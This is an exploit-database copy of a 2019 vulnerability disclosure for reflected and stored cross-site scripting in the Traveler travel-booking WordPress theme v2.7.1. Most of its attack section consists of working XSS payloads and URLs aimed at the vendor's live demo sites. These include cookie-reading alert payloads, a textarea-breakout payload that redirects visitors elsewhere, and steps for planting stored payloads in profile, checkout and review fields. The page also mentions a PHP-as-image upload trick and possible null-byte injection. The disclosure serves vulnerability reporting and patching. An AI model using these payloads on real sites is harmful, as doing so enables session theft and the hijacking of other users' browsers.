Advertisement






Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-07
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050064

Below is a copy:

Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections
[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7.1
  
[?] :: Technical Details & Description:
# Weak security measures like bad input & textarea fields data filtering has been discovered in the Traveler - Travel Booking WordPress Theme. Current version of this WordPress premium theme is 2.7.1.

[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend #1: https://carmap.travelerwp.com/
# Backend #1: https://carmap.travelerwp.com/page-user-setting/
# Frontend #2: https://remap.travelerwp.com/
# Backend #2: https://remap.travelerwp.com/page-user-setting/

[!] :: Special Note:
# 5.869 Sales
# Change Avatar upload field works really strange. F.e., u can upload any .PHP file with extension .php.png and break profile page (Server will respond with Error #500). Another possible issue is Null Byte Injection in PHP, but on the demo website any access to uploaded file will be blocked by CloudFlare.
# On the Google Chrome browser reflected XSS isn't work cause of built-in browser security measures, better use Mozilla or Opera instead.

[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# https://carmap.travelerwp.com/page-user-setting/
# https://remap.travelerwp.com/page-user-setting/
# https://remap.travelerwp.com/st_rental/midtown-manhattan-oversized/
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
# https://remap.travelerwp.com/?s="><img src=x onerror=alert(`QUIXSS`)>
# https://remap.travelerwp.com/?s=%22%3E%3Cinput%20type=text%20autofocus%20onfocus=alert(document.cookie)%3E

[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection use default WordPress search on the demo website https://remap.travelerwp.com/?s=[payload]
# Sample payload #1: "><img src=x onerror=alert(document.cookie)>
# Sample payload #2: <input type=text autofocus onfocus=alert(document.cookie)>

[+] :: PoC [Stored XSS Injection]:
# Go to the demo website https://carmap.travelerwp.com and register a new account (there is no validation or activation process) and then log in to your account. Go to https://carmap.travelerwp.com/page-user-setting/ page next. All input fields except Username and E-mail can be used for Stored XSS Injections, for test u can use any payload started from "> just to close input field and </textarea> to close the text box. Save the data and your payload(s) will be successfully injected.
# Same logic works for any other theme options: Checkout page https://remap.travelerwp.com/checkout/ with multiple vulnerable input fields, Write Review page https://remap.travelerwp.com/page-user-setting/?sc=write_review&item_id=1084 etc. etc.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: </textarea><img src="x" onerror="window.location.replace('https://twitter.com/quixss');">

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum